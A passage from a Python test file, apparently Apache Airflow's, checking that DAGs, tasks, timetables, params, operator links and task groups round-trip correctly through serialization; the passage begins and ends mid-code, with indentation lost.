for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
@pytest.mark.parametrize(
"timetable",
[cron_timetable("0 0 * * *"), CustomSerializationTimetable("foo")],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_dag_roundtrip_from_timetable(self, timetable):
"""Verify a timetable-backed serialization can be deserialized."""
dag = get_timetable_based_simple_dag(timetable)
roundtripped = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(roundtripped, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually.
'timetable',
'timezone',
# Need to check fields in it, to exclude functions.
'default_args',
"_task_group",
'params',
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(
dag, field
), f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timetable.summary == dag.timetable.summary
assert serialized_dag.timetable.serialize() == dag.timetable.serialize()
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_ext',
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
'params',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_ext) == set(task.template_ext)
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Ugly hack as some operators override params var in their init
if isinstance(task.params, ParamsDict):
assert serialized_task.params.dump() == task.params.dump()
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@pytest.mark.parametrize(
"dag_start_date, task_start_date, expected_task_start_date",
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(pendulum.datetime(2019, 8, 1, tz='UTC'), None, pendulum.datetime(2019, 8, 1, tz='UTC')),
],
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
assert "start_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "start_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.start_date == expected_task_start_date
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@pytest.mark.parametrize(
"dag_end_date, task_end_date, expected_task_end_date",
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
],
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
assert "end_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "end_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.end_date == expected_task_end_date
@pytest.mark.parametrize(
"serialized_timetable, expected_timetable",
[
({"__type": "airflow.timetables.simple.NullTimetable", "__var": {}}, NullTimetable()),
(
{
"__type": "airflow.timetables.interval.CronDataIntervalTimetable",
"__var": {"expression": "@weekly", "timezone": "UTC"},
},
cron_timetable("0 0 * * 0"),
),
({"__type": "airflow.timetables.simple.OnceTimetable", "__var": {}}, OnceTimetable()),
(
{
"__type": "airflow.timetables.interval.DeltaDataIntervalTimetable",
"__var": {"delta": 86400.0},
},
delta_timetable(timedelta(days=1)),
),
(CUSTOM_TIMETABLE_SERIALIZED, CustomSerializationTimetable("foo")),
],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_deserialization_timetable(
self,
serialized_timetable,
expected_timetable,
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"timetable": serialized_timetable,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.timetable == expected_timetable
def test_deserialization_timetable_unregistered(self):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"timetable": CUSTOM_TIMETABLE_SERIALIZED,
},
}
SerializedDAG.validate_schema(serialized)
with pytest.raises(ValueError) as ctx:
SerializedDAG.from_dict(serialized)
message = (
"Timetable class "
"'tests.test_utils.timetables.CustomSerializationTimetable' "
"is not registered"
)
assert str(ctx.value) == message
@pytest.mark.parametrize(
"serialized_schedule_interval, expected_timetable",
[
(None, NullTimetable()),
("@weekly", cron_timetable("0 0 * * 0")),
("@once", OnceTimetable()),
(
{"__type": "timedelta", "__var": 86400.0},
delta_timetable(timedelta(days=1)),
),
],
)
def test_deserialization_schedule_interval(
self,
serialized_schedule_interval,
expected_timetable,
):
"""Test DAGs serialized before 2.2 can be correctly deserialized."""
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.timetable == expected_timetable
@pytest.mark.parametrize(
"val, expected",
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
],
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
assert serialized == expected
round_tripped = SerializedDAG._deserialize(serialized)
assert val == round_tripped
@pytest.mark.parametrize(
"val, expected_val",
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
],
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
assert "params" in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_dag.params.dump()
assert expected_val == deserialized_simple_task.params.dump()
def test_invalid_params(self):
"""
Test to make sure that only native Param objects are being passed as dag or task params
"""
class S3Param(Param):
def __init__(self, path: str):
schema = {"type": "string", "pattern": r"s3:\/\/(.+?)\/(.+)"}
super().__init__(default=path, schema=schema)
dag = DAG(dag_id='simple_dag', params={'path': S3Param('s3://my_bucket/my_path')})
with pytest.raises(SerializationError):
SerializedDAG.to_dict(dag)
dag = DAG(dag_id='simple_dag')
BaseOperator(
task_id='simple_task',
dag=dag,
start_date=datetime(2019, 8, 1),
params={'path': S3Param('s3://my_bucket/my_path')},
)
with pytest.raises(SerializationError):
SerializedDAG.to_dict(dag)
@pytest.mark.parametrize(
"val, expected_val",
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
],
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]["tasks"][0]
else:
assert "params" not in serialized_dag["dag"]["tasks"][0]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_simple_task.params.dump()
def test_extra_serialized_field_and_operator_links(self):
"""
        Assert that the extra field exists and that Operator Links defined in plugins
        as well as inbuilt Operator Links work.
        This test also depends on GoogleLink() being registered as a plugin
        in tests/plugins/test_plugin.py.
        It verifies that if an extra operator link is registered in a plugin
        via ``operator_extra_links`` and the same link is also defined on
        the Operator in ``BaseOperator.operator_extra_links``, the correct
        extra link is produced.
"""
test_date = timezone.DateTime(2019, 8, 1, tzinfo=timezone.utc)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == "true"
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
        # Check that the serialized version of the operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomOpLink': {}}
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {'Google Custom', 'airflow', 'github', 'google'}
XCom.set(
key='search_query',
value="dummy_value_1",
task_id=simple_task.task_id,
dag_id=simple_task.dag_id,
execution_date=test_date,
)
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
assert 'http://google.com/custom_base_link?search=dummy_value_1' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self, caplog):
"""
        Assert that an OperatorLink that is neither registered via plugins nor an inbuilt
        Operator Link does not break deserialization: the DAG still deserializes, but an error is logged.
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with caplog.at_level("ERROR", logger="airflow.serialization.serialized_objects"):
SerializedDAG.from_dict(serialized_dag)
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' not registered"
)
assert expected_err_msg in caplog.text
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
        Assert that the extra field exists and that Operator Links defined in plugins
        as well as inbuilt Operator Links work when an operator defines multiple links.
        This test also depends on GoogleLink() being registered as a plugin
        in tests/plugins/test_plugin.py.
        It verifies that if extra operator links are registered in a plugin
        via ``operator_extra_links`` and the same links are also defined on
        the Operator in ``BaseOperator.operator_extra_links``, the correct
        extra links are produced.
"""
test_date = timezone.DateTime(2019, 8, 1, tzinfo=timezone.utc)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == ["echo", "true"]
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
        # Check that the serialized version of the operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {
'BigQuery Console #1',
'BigQuery Console #2',
'airflow',
'github',
'google',
}
XCom.set(
key='search_query',
value=["dummy_value_1", "dummy_value_2"],
task_id=simple_task.task_id,
dag_id=simple_task.dag_id,
execution_date=test_date,
)
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_1' == custom_inbuilt_link
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_2' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
class ClassWithCustomAttributes:
"""
        Class for testing purposes: allows creating objects with custom attributes in a single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return f"{self.__class__.__name__}({str(self.__dict__)})"
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@pytest.mark.parametrize(
"templated_field, expected_field",
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
],
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
        Test that templated_fields exist for all Operators in a Serialized DAG.
        Since we don't want to inflate arbitrary Python objects (it poses an RCE/security risk, etc.),
        we want to check that non-"basic" objects are turned into strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
assert expected_field == getattr(deserialized_test_task, "bash_command")
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
        keys in DAG.get_serialized_fields are listed in the schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
        # The parameters we add manually during serialization need to be ignored
ignored_keys: set = {
"is_subdag",
"tasks",
"has_on_success_callback",
"has_on_failure_callback",
"dag_dependencies",
"params",
}
keys_for_backwards_compat: set = {
"_concurrency",
}
dag_params: set = set(dag_schema.keys()) - ignored_keys - keys_for_backwards_compat
assert set(DAG.get_serialized_fields()) == dag_params
def test_operator_subclass_changing_base_defaults(self):
assert (
BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
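        # The subclass flips the default: serialization must capture the instance
        # value (False) rather than falling back to BaseOperator's class default (True).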
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
        This test verifies that no new fields have been added to BaseOperator, and serves as a
        reminder that serialization support and tests must be added for any new field.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
assert {
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'_pre_execute_hook': None,
'_post_execute_hook': None,
'depends_on_past': False,
'do_xcom_push': True,
'doc': None,
'doc_json': None,
'doc_md': None,
'doc_rst': None,
'doc_yaml': None,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_active_tis_per_dag': None,
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
} == fields, """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
def test_deps_sorted(self):
"""
        Tests serialize_operator, making sure the deps are serialized in sorted order.
"""
from airflow.operators.dummy import DummyOperator
from airflow.sensors.external_task import ExternalTaskSensor
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_deps_sorted", start_date=execution_date) as dag:
task1 = ExternalTaskSensor(
task_id="task1",
external_dag_id="external_dag_id",
mode="reschedule",
)
task2 = DummyOperator(task_id="task2")
task1 >> task2
serialize_op = SerializedBaseOperator.serialize_operator(dag.task_dict["task1"])
deps = serialize_op["deps"]
assert deps == [
'airflow.ti_deps.deps.not_in_retry_period_dep.NotInRetryPeriodDep',
'airflow.ti_deps.deps.not_previously_skipped_dep.NotPreviouslySkippedDep',
'airflow.ti_deps.deps.prev_dagrun_dep.PrevDagrunDep',
'airflow.ti_deps.deps.ready_to_reschedule.ReadyToRescheduleDep',
'airflow.ti_deps.deps.trigger_rule_dep.TriggerRuleDep',
]
def test_task_group_sorted(self):
"""
        Tests serialize_task_group, making sure the upstream/downstream id lists are sorted.
"""
from airflow.operators.dummy import DummyOperator
from airflow.serialization.serialized_objects import SerializedTaskGroup
from airflow.utils.task_group import TaskGroup
"""
start
╱ ╲
╱ ╲
task_group_up1 task_group_up2
(task_up1) (task_up2)
╲ ╱
task_group_middle
(task_middle)
╱ ╲
task_group_down1 task_group_down2
(task_down1) (task_down2)
╲ ╱
╲ ╱
end
"""
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_task_group_sorted", start_date=execution_date) as dag:
start = DummyOperator(task_id="start")
with TaskGroup("task_group_up1") as task_group_up1:
_ = DummyOperator(task_id="task_up1")
with TaskGroup("task_group_up2") as task_group_up2:
_ = DummyOperator(task_id="task_up2")
with TaskGroup("task_group_middle") as task_group_middle:
_ = DummyOperator(task_id="task_middle")
with TaskGroup("task_group_down1") as task_group_down1:
_ = DummyOperator(task_id="task_down1")
with TaskGroup("task_group_down2") as task_group_down2:
_ = DummyOperator(task_id="task_down2")
end = DummyOperator(task_id='end')
start >> task_group_up1
start >> task_group_up2
task_group_up1 >> task_group_middle
task_group_up2 >> task_group_middle
task_group_middle >> task_group_down1
task_group_middle >> task_group_down2
task_group_down1 >> end
task_group_down2 >> end
task_group_middle_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_middle"]
)
upstream_group_ids = task_group_middle_dict["upstream_group_ids"]
assert upstream_group_ids == ['task_group_up1', 'task_group_up2']
upstream_task_ids = task_group_middle_dict["upstream_task_ids"]
assert upstream_task_ids == ['task_group_up1.task_up1', 'task_group_up2.task_up2']
downstream_group_ids = task_group_middle_dict["downstream_group_ids"]
assert downstream_group_ids == ['task_group_down1', 'task_group_down2']
task_group_down1_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_down1"]
)
downstream_task_ids = task_group_down1_dict["downstream_task_ids"]
assert downstream_task_ids == ['end']
def test_edge_info_serialization(self):
"""
Tests edge_info serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.edgemodifier import Label
with DAG("test_edge_info_serialization", start_date=datetime(2020, 1, 1)) as dag:
task1 = DummyOperator(task_id="task1")
task2 = DummyOperator(task_id="task2")
task1 >> Label("test label") >> task2
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.edge_info == dag.edge_info
@pytest.mark.parametrize(
"mode, expect_custom_deps",
[
("poke", False),
("reschedule", True),
],
)
def test_serialize_sensor(self, mode, expect_custom_deps):
from airflow.sensors.base import BaseSensorOperator
class DummySensor(BaseSensorOperator):
def poke(self, context):
return False
op = DummySensor(task_id='dummy', mode=mode, poke_interval=23)
blob = SerializedBaseOperator.serialize_operator(op)
if expect_custom_deps:
assert "deps" in blob
else:
assert "deps" not in blob
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert op.deps == serialized_op.deps
@pytest.mark.parametrize(
"passed_success_callback, expected_value",
[
({"on_success_callback": lambda x: print("hi")}, True),
({}, False),
],
)
def test_dag_on_success_callback_roundtrip(self, passed_success_callback, expected_value):
"""
        Test that when on_success_callback is passed to the DAG, has_on_success_callback is stored
        in the serialized JSON blob, and that after deserialization dag.has_on_success_callback is True.
        When the callback is not set, has_on_success_callback should not be stored in the serialized
        blob and should therefore default to False on deserialization.
"""
dag = DAG(dag_id='test_dag_on_success_callback_roundtrip', **passed_success_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_success_callback" in serialized_dag["dag"]
else:
assert "has_on_success_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_success_callback is expected_value
@pytest.mark.parametrize(
"passed_failure_callback, expected_value",
[
({"on_failure_callback": lambda x: print("hi")}, True),
({}, False),
],
)
def test_dag_on_failure_callback_roundtrip(self, passed_failure_callback, expected_value):
"""
        Test that when on_failure_callback is passed to the DAG, has_on_failure_callback is stored
        in the serialized JSON blob, and that after deserialization dag.has_on_failure_callback is True.
        When the callback is not set, has_on_failure_callback should not be stored in the serialized
        blob and should therefore default to False on deserialization.
"""
dag = DAG(dag_id='test_dag_on_failure_callback_roundtrip', **passed_failure_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_failure_callback" in serialized_dag["dag"]
else:
assert "has_on_failure_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_failure_callback is expected_value
@pytest.mark.parametrize(
"object_to_serialized, expected_output",
[
(
['task_1', 'task_5', 'task_2', 'task_4'],
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{'task_1', 'task_5', 'task_2', 'task_4'},
['task_1', 'task_2', 'task_4', 'task_5'],
),
(
('task_1', 'task_5', 'task_2', 'task_4'),
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{
"staging_schema": [
{"key:": "foo", "value": "bar"},
{"key:": "this", "value": "that"},
"test_conf",
]
},
{
"staging_schema": [
{"__type": "dict", "__var": {"key:": "foo", "value": "bar"}},
{
"__type": "dict",
"__var": {"key:": "this", "value": "that"},
},
"test_conf",
]
},
),
(
{"task3": "test3", "task2": "test2", "task1": "test1"},
{"task1": "test1", "task2": "test2", "task3": "test3"},
),
(
('task_1', 'task_5', 'task_2', 3, ["x", "y"]),
['task_1', 'task_5', 'task_2', 3, ["x", "y"]],
),
],
)
def test_serialized_objects_are_sorted(self, object_to_serialized, expected_output):
"""Test Serialized Sets are sorted while list and tuple preserve order"""
serialized_obj = SerializedDAG._serialize(object_to_serialized)
if isinstance(serialized_obj, dict) and "__type" in serialized_obj:
serialized_obj = serialized_obj["__var"]
assert serialized_obj == expected_output
def test_params_upgrade(self):
serialized = {
"__version": 1,
"dag": {
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"params": {"none": None, "str": "str", "dict": {"a": "b"}},
},
}
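        # A plain pre-2.2 params dict like the one above is expected to be upgraded to
        # Param objects on deserialization; dict.__getitem__ below bypasses Param
        # resolution so the stored object itself can be inspected.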
